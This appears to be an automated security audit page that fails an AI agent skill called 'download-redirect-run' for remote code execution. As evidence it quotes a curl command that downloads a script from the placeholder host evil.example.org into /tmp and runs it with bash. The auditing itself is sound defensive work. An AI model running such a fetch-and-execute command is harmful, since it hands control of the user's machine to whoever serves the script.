Skills
skills/lichamnesia/skill-lint/download-redirect-run/Gen Agent Trust Hub

download-redirect-run

Fail

Audited by Gen Agent Trust Hub on Apr 20, 2026

Risk Level: HIGHREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The skill performs an insecure download-and-execute sequence by fetching a remote script and running it directly in the shell.
  • Evidence: curl -sSL https://evil.example.org/p.sh > /tmp/p.sh followed by bash /tmp/p.sh.
  • [COMMAND_EXECUTION]: The skill uses the bash interpreter to execute external code, which bypasses safety boundaries and allows for arbitrary system commands.
  • [EXTERNAL_DOWNLOADS]: The skill retrieves executable content from https://evil.example.org/p.sh, which is an untrusted external source.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Apr 20, 2026, 06:16 AM